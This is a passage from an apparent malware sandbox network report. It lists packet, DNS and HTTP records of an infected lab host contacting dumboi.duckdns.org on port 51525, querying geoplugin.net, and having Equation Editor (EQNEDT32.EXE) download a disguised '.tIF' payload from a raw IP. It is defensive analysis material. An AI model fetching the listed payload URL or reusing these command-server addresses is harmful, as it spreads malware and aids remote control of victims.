                                                                                                                                      Oct 5, 2024 14:53:02.644289970 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.644323111 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.644340992 CEST4916551525192.168.2.22185.236.203.101
                                                                                                                                      Oct 5, 2024 14:53:02.644355059 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.644388914 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.644421101 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.644429922 CEST4916551525192.168.2.22185.236.203.101
                                                                                                                                      Oct 5, 2024 14:53:02.644429922 CEST4916551525192.168.2.22185.236.203.101
                                                                                                                                      Oct 5, 2024 14:53:02.644454956 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.644491911 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.644526005 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.644536018 CEST4916551525192.168.2.22185.236.203.101
                                                                                                                                      Oct 5, 2024 14:53:02.644558907 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.644593954 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.644625902 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.644632101 CEST4916551525192.168.2.22185.236.203.101
                                                                                                                                      Oct 5, 2024 14:53:02.644632101 CEST4916551525192.168.2.22185.236.203.101
                                                                                                                                      Oct 5, 2024 14:53:02.644660950 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.644692898 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.644726992 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.644759893 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.644768953 CEST4916551525192.168.2.22185.236.203.101
                                                                                                                                      Oct 5, 2024 14:53:02.644768953 CEST4916551525192.168.2.22185.236.203.101
                                                                                                                                      Oct 5, 2024 14:53:02.644795895 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.644828081 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.644861937 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.644876003 CEST4916551525192.168.2.22185.236.203.101
                                                                                                                                      Oct 5, 2024 14:53:02.644893885 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.644927025 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.644934893 CEST4916551525192.168.2.22185.236.203.101
                                                                                                                                      Oct 5, 2024 14:53:02.644958019 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.644992113 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.645020962 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.645034075 CEST4916551525192.168.2.22185.236.203.101
                                                                                                                                      Oct 5, 2024 14:53:02.645034075 CEST4916551525192.168.2.22185.236.203.101
                                                                                                                                      Oct 5, 2024 14:53:02.645054102 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.645087957 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.645118952 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.645153046 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.645158052 CEST4916551525192.168.2.22185.236.203.101
                                                                                                                                      Oct 5, 2024 14:53:02.645158052 CEST4916551525192.168.2.22185.236.203.101
                                                                                                                                      Oct 5, 2024 14:53:02.645186901 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.645220041 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.645248890 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.645282984 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.645289898 CEST4916551525192.168.2.22185.236.203.101
                                                                                                                                      Oct 5, 2024 14:53:02.645289898 CEST4916551525192.168.2.22185.236.203.101
                                                                                                                                      Oct 5, 2024 14:53:02.645314932 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.645348072 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.645380974 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.645411968 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.645418882 CEST4916551525192.168.2.22185.236.203.101
                                                                                                                                      Oct 5, 2024 14:53:02.645418882 CEST4916551525192.168.2.22185.236.203.101
                                                                                                                                      Oct 5, 2024 14:53:02.645445108 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.645478010 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.645484924 CEST4916551525192.168.2.22185.236.203.101
                                                                                                                                      Oct 5, 2024 14:53:02.645510912 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.645544052 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.645575047 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.645608902 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.645615101 CEST4916551525192.168.2.22185.236.203.101
                                                                                                                                      Oct 5, 2024 14:53:02.645615101 CEST4916551525192.168.2.22185.236.203.101
                                                                                                                                      Oct 5, 2024 14:53:02.645643950 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.645709991 CEST4916551525192.168.2.22185.236.203.101
                                                                                                                                      Oct 5, 2024 14:53:02.647027969 CEST4916551525192.168.2.22185.236.203.101
                                                                                                                                      Oct 5, 2024 14:53:02.727154970 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.727461100 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.727494001 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.727528095 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.727560997 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.727576017 CEST4916551525192.168.2.22185.236.203.101
                                                                                                                                      Oct 5, 2024 14:53:02.727576017 CEST4916551525192.168.2.22185.236.203.101
                                                                                                                                      Oct 5, 2024 14:53:02.727593899 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.727627039 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.727658987 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.727694035 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.727700949 CEST4916551525192.168.2.22185.236.203.101
                                                                                                                                      Oct 5, 2024 14:53:02.727700949 CEST4916551525192.168.2.22185.236.203.101
                                                                                                                                      Oct 5, 2024 14:53:02.728740931 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.728753090 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.728764057 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.728806019 CEST4916551525192.168.2.22185.236.203.101
                                                                                                                                      Oct 5, 2024 14:53:02.728827000 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.728838921 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.728885889 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.728897095 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.728902102 CEST4916551525192.168.2.22185.236.203.101
                                                                                                                                      Oct 5, 2024 14:53:02.729151011 CEST4916551525192.168.2.22185.236.203.101
                                                                                                                                      Oct 5, 2024 14:53:02.729152918 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.729234934 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.729244947 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.729279041 CEST4916551525192.168.2.22185.236.203.101
                                                                                                                                      Oct 5, 2024 14:53:02.729279041 CEST4916551525192.168.2.22185.236.203.101
                                                                                                                                      Oct 5, 2024 14:53:02.729300022 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.729310036 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.729320049 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.729331017 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.729342937 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.729368925 CEST4916551525192.168.2.22185.236.203.101
                                                                                                                                      Oct 5, 2024 14:53:02.729368925 CEST4916551525192.168.2.22185.236.203.101
                                                                                                                                      Oct 5, 2024 14:53:02.729414940 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.729425907 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.729437113 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.729451895 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.729461908 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.729474068 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.729475975 CEST4916551525192.168.2.22185.236.203.101
                                                                                                                                      Oct 5, 2024 14:53:02.729475975 CEST4916551525192.168.2.22185.236.203.101
                                                                                                                                      Oct 5, 2024 14:53:02.729509115 CEST4916551525192.168.2.22185.236.203.101
                                                                                                                                      Oct 5, 2024 14:53:02.729546070 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.729741096 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.729804993 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.729811907 CEST4916551525192.168.2.22185.236.203.101
                                                                                                                                      Oct 5, 2024 14:53:02.729815960 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.729827881 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.729837894 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.729846954 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.729859114 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.729871035 CEST4916551525192.168.2.22185.236.203.101
                                                                                                                                      Oct 5, 2024 14:53:02.729871035 CEST4916551525192.168.2.22185.236.203.101
                                                                                                                                      Oct 5, 2024 14:53:02.730026007 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.730041027 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.730046988 CEST4916551525192.168.2.22185.236.203.101
                                                                                                                                      Oct 5, 2024 14:53:02.730051041 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.730061054 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.730077028 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.730087996 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.730088949 CEST4916551525192.168.2.22185.236.203.101
                                                                                                                                      Oct 5, 2024 14:53:02.730098963 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.730108023 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.730118990 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.730127096 CEST4916551525192.168.2.22185.236.203.101
                                                                                                                                      Oct 5, 2024 14:53:02.730127096 CEST4916551525192.168.2.22185.236.203.101
                                                                                                                                      Oct 5, 2024 14:53:02.730143070 CEST4916551525192.168.2.22185.236.203.101
                                                                                                                                      Oct 5, 2024 14:53:02.730245113 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.730294943 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.730305910 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.730315924 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.730336905 CEST4916551525192.168.2.22185.236.203.101
                                                                                                                                      Oct 5, 2024 14:53:02.730336905 CEST4916551525192.168.2.22185.236.203.101
                                                                                                                                      Oct 5, 2024 14:53:02.730353117 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.730427027 CEST4916551525192.168.2.22185.236.203.101
                                                                                                                                      Oct 5, 2024 14:53:02.730428934 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.730439901 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.730448961 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.730457067 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.730467081 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.730492115 CEST4916551525192.168.2.22185.236.203.101
                                                                                                                                      Oct 5, 2024 14:53:02.730492115 CEST4916551525192.168.2.22185.236.203.101
                                                                                                                                      Oct 5, 2024 14:53:02.730508089 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.730516911 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.730545998 CEST4916551525192.168.2.22185.236.203.101
                                                                                                                                      Oct 5, 2024 14:53:02.730612040 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.730622053 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.730631113 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.730642080 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.730653048 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.730664968 CEST4916551525192.168.2.22185.236.203.101
                                                                                                                                      Oct 5, 2024 14:53:02.730703115 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.730711937 CEST4916551525192.168.2.22185.236.203.101
                                                                                                                                      Oct 5, 2024 14:53:02.730714083 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.730724096 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.730741978 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.730753899 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.730757952 CEST4916551525192.168.2.22185.236.203.101
                                                                                                                                      Oct 5, 2024 14:53:02.730786085 CEST4916551525192.168.2.22185.236.203.101
                                                                                                                                      Oct 5, 2024 14:53:02.730825901 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.730837107 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.730895042 CEST4916551525192.168.2.22185.236.203.101
                                                                                                                                      Oct 5, 2024 14:53:02.730904102 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.730915070 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.730931997 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.730942011 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.730952978 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.730962992 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.730963945 CEST4916551525192.168.2.22185.236.203.101
                                                                                                                                      Oct 5, 2024 14:53:02.730963945 CEST4916551525192.168.2.22185.236.203.101
                                                                                                                                      Oct 5, 2024 14:53:02.731127977 CEST4916551525192.168.2.22185.236.203.101
                                                                                                                                      Oct 5, 2024 14:53:02.731426954 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.731443882 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.731455088 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:02.731492043 CEST4916551525192.168.2.22185.236.203.101
                                                                                                                                      Oct 5, 2024 14:53:02.731492043 CEST4916551525192.168.2.22185.236.203.101
                                                                                                                                      Oct 5, 2024 14:53:02.751121044 CEST4916551525192.168.2.22185.236.203.101
                                                                                                                                      Oct 5, 2024 14:53:08.443351984 CEST4916551525192.168.2.22185.236.203.101
                                                                                                                                      Oct 5, 2024 14:53:08.448873997 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:08.448893070 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:08.448946953 CEST4916551525192.168.2.22185.236.203.101
                                                                                                                                      Oct 5, 2024 14:53:08.453845978 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:08.453860044 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:08.453876019 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:08.453912973 CEST4916551525192.168.2.22185.236.203.101
                                                                                                                                      Oct 5, 2024 14:53:08.453933954 CEST4916551525192.168.2.22185.236.203.101
                                                                                                                                      Oct 5, 2024 14:53:08.453952074 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:08.454005957 CEST4916551525192.168.2.22185.236.203.101
                                                                                                                                      Oct 5, 2024 14:53:08.458734035 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:08.458746910 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:08.458786964 CEST4916551525192.168.2.22185.236.203.101
                                                                                                                                      Oct 5, 2024 14:53:08.458827972 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:08.458899021 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:08.458911896 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:08.458925962 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:08.458959103 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:08.458972931 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:08.459161043 CEST4916551525192.168.2.22185.236.203.101
                                                                                                                                      Oct 5, 2024 14:53:08.463641882 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:08.463654995 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:08.463716984 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:08.464207888 CEST5152549165185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:08.464262962 CEST4916551525192.168.2.22185.236.203.101
                                                                                                                                      Oct 5, 2024 14:53:13.837627888 CEST5152549164185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:13.839030981 CEST4916451525192.168.2.22185.236.203.101
                                                                                                                                      Oct 5, 2024 14:53:13.843919039 CEST5152549164185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:43.881560087 CEST5152549164185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:43.883048058 CEST4916451525192.168.2.22185.236.203.101
                                                                                                                                      Oct 5, 2024 14:53:43.887976885 CEST5152549164185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:54:03.883745909 CEST4916680192.168.2.22178.237.33.50
                                                                                                                                      Oct 5, 2024 14:54:04.273050070 CEST4916680192.168.2.22178.237.33.50
                                                                                                                                      Oct 5, 2024 14:54:04.975027084 CEST4916680192.168.2.22178.237.33.50
                                                                                                                                      Oct 5, 2024 14:54:06.176232100 CEST4916680192.168.2.22178.237.33.50
                                                                                                                                      Oct 5, 2024 14:54:08.581511974 CEST4916680192.168.2.22178.237.33.50
                                                                                                                                      Oct 5, 2024 14:54:13.464183092 CEST4916680192.168.2.22178.237.33.50
                                                                                                                                      Oct 5, 2024 14:54:13.894162893 CEST5152549164185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:54:13.895688057 CEST4916451525192.168.2.22185.236.203.101
                                                                                                                                      Oct 5, 2024 14:54:13.900566101 CEST5152549164185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:54:23.070993900 CEST4916680192.168.2.22178.237.33.50
                                                                                                                                      Oct 5, 2024 14:54:43.911716938 CEST5152549164185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:54:43.916692019 CEST4916451525192.168.2.22185.236.203.101
                                                                                                                                      Oct 5, 2024 14:54:43.921600103 CEST5152549164185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:55:13.942894936 CEST5152549164185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:55:13.946091890 CEST4916451525192.168.2.22185.236.203.101
                                                                                                                                      Oct 5, 2024 14:55:13.950936079 CEST5152549164185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:55:43.975833893 CEST5152549164185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:55:43.977255106 CEST4916451525192.168.2.22185.236.203.101
                                                                                                                                      Oct 5, 2024 14:55:43.982273102 CEST5152549164185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:56:14.009018898 CEST5152549164185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:56:14.012285948 CEST4916451525192.168.2.22185.236.203.101
                                                                                                                                      Oct 5, 2024 14:56:14.017225981 CEST5152549164185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:56:44.038983107 CEST5152549164185.236.203.101192.168.2.22
                                                                                                                                      Oct 5, 2024 14:56:44.040379047 CEST4916451525192.168.2.22185.236.203.101
                                                                                                                                      Oct 5, 2024 14:56:44.045264959 CEST5152549164185.236.203.101192.168.2.22
                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                      Oct 5, 2024 14:52:53.894634008 CEST5456253192.168.2.228.8.8.8
                                                                                                                                      Oct 5, 2024 14:52:53.901221991 CEST53545628.8.8.8192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:58.196290016 CEST5291753192.168.2.228.8.8.8
                                                                                                                                      Oct 5, 2024 14:52:58.292195082 CEST53529178.8.8.8192.168.2.22
                                                                                                                                      Oct 5, 2024 14:53:00.300733089 CEST6275153192.168.2.228.8.8.8
                                                                                                                                      Oct 5, 2024 14:53:00.310501099 CEST53627518.8.8.8192.168.2.22
                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                      Oct 5, 2024 14:52:53.894634008 CEST192.168.2.228.8.8.80xdad1Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                      Oct 5, 2024 14:52:58.196290016 CEST192.168.2.228.8.8.80x274aStandard query (0)dumboi.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                                                      Oct 5, 2024 14:53:00.300733089 CEST192.168.2.228.8.8.80x3974Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                      Oct 5, 2024 14:52:53.901221991 CEST8.8.8.8192.168.2.220xdad1No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                                                                      Oct 5, 2024 14:52:53.901221991 CEST8.8.8.8192.168.2.220xdad1No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                                                                      Oct 5, 2024 14:52:53.901221991 CEST8.8.8.8192.168.2.220xdad1No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                                                                      Oct 5, 2024 14:52:53.901221991 CEST8.8.8.8192.168.2.220xdad1No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                                                                      Oct 5, 2024 14:52:58.292195082 CEST8.8.8.8192.168.2.220x274aNo error (0)dumboi.duckdns.org185.236.203.101A (IP address)IN (0x0001)false
                                                                                                                                      Oct 5, 2024 14:53:00.310501099 CEST8.8.8.8192.168.2.220x3974No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                                                                                      • raw.githubusercontent.com
                                                                                                                                      • 107.172.130.147
                                                                                                                                      • geoplugin.net
                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      0192.168.2.2249161107.172.130.147803368C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Oct 5, 2024 14:52:49.051754951 CEST342OUTGET /240/nicepciturewithggreatethingstobe.tIF HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                      Host: 107.172.130.147
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Oct 5, 2024 14:52:49.539937973 CEST1236INHTTP/1.1 200 OK
                                                                                                                                      Date: Sat, 05 Oct 2024 12:52:49 GMT
                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                                                                                                      Last-Modified: Thu, 03 Oct 2024 02:16:50 GMT
                                                                                                                                      ETag: "50308-6238925b0300f"
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      Content-Length: 328456
                                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: image/tiff
